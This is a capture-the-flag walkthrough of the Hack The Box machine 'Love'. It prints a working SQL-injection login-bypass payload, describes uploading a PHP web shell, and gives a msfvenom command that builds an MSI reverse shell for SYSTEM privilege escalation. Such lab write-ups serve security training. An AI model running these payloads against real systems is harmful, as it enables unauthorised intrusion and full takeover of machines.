HTB: Love

...

Intro:

So. This was a fun box. It took me a hot second to solve due to me getting tunnel-vision over the login page, but this hyperfixation ended up being part of the solution!

SPOILER ALERT: I found an SQL injection which was probably not the intended solution (especially compared to all the other solutions out there).

Recon:

As always we do nmap -sT -sV -v <ip> to find open ports. This shows us quite a few, but we notice a web server, which we'll check out.

Before we start snooping around in the browser, we can start gobuster to check for directories: gobuster dir -u <ip> -w <path/to/dict/>.

Exploration:

We are presented with a voting page. For what? We will never know. Anyways, we can start looking around, trying to determine if the site is using a CMS or has some version of anything displayed. Nothing. So we go back to the login page and try some arbitrary values (namely '0'). All of them show the same error: Voter ID not found.

Next, we try some good 'ol SQL injection: 0'OR '1'='1. To our surprise we get an "Incorrect password" error! This means the page is vulnerable to an SQL injection! What exactly the injection is? I'm not sure, but after a very looong session of trial and many errors, we realize the page title is quite specific: "Voting System in PHP". I then get the genius idea to check Exploit DB for an SQL injection against "Voting System in PHP". We're plesantly presented with a couple results, one of which is exactly what we're looking for! [1]

Hacking the Login:

Checking the gobuster results yeilds us the admin login page, which looks exactly like the voters login page. Using our PoC injection from before, we see that this page is also vulnerable. We can then read the newly discovered exploits how-to and use burpsuite to relay the info we need. Something I've found is that the "login" value should be empty. I also change the password to "passie" and replace the bcrypt string with the appropriate value. This is the full payload:
password=passie&username=notadmin' UNION SELECT 1,2,"$2a$12$TkzTU9cx01SFg9efTzbkJea8QzdMebNJTVyPYEvOESXGFYLSr1xEO",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -&login="". Once we POST this payload to the login page we're greeted with the admin home page.

Admin page

Uploading Pictu- Files:

As we look around the page we come across a tab: "Voters". Within this tab we're able to create a new voter, which we name "Hacker Mike". We can also upload a picture. Hmm..... Through our malicious ideologies, we try uploading a php file which doesn't throw any errors. By checking inspect elements we can see the directory these "pictures" are held is in "/images". We check and TADA! Our file is there!

Creating a new voter while uploading a PHP reverse shell

Getting User:

We can directly access our file which brings us a web shell, with the GET key being "miked". Web shells are kinda crapy though. We can get a reverse shell going with a PowerShell one-liner [2]. Once we have a better shell we can comfortably find the flag file at "C:\Users\Phoebe\Desktop\user.txt"

Location of user.txt file (No spoilers!)

Getting Root:

With user out of the way, we move on to root! We can upload winPEAS to the server the same way we did our php web shell, or we can pull it up using Invoke-WebRequest. Whichever tickled your fancy, we should now be able to execute winPEAS. What I've done is sent the output to a file so I can pull it down to my machine for analysis (The output excedes the max lines of my terminal, so I don't see a lot of output). To read this file we need to use "more", which understands ANSI colour codes.

Looking through the report we find that both "AlwaysInstallElevated" registers are set to 1. This means we can "install" any .msi file as NT AUTHORITY/SYSTEM. We can generate a reverse shell using msfvenom: msfvenom -p windows/meterpreter/reverse_tcp -f msi lhost=<ip> lport=3188 > hacked.msi. As mich as I hate using meterpreter, I've not had luck using a generic shell.

Once we establish the shell we can verify our godly status with whoami, which returns an exciting "nt authority\system"! We can then find the root flag at "C"\Users\Administrator\Desktop\root.txt"! Bam! We've successfully owned the Love box!

whoami plus location of root.txt (No spoilers!)




Resources:

Exploit DB SQL Injection [EXTERNAL]


PowerShell One-Liner



Last Edit: 2021.08.20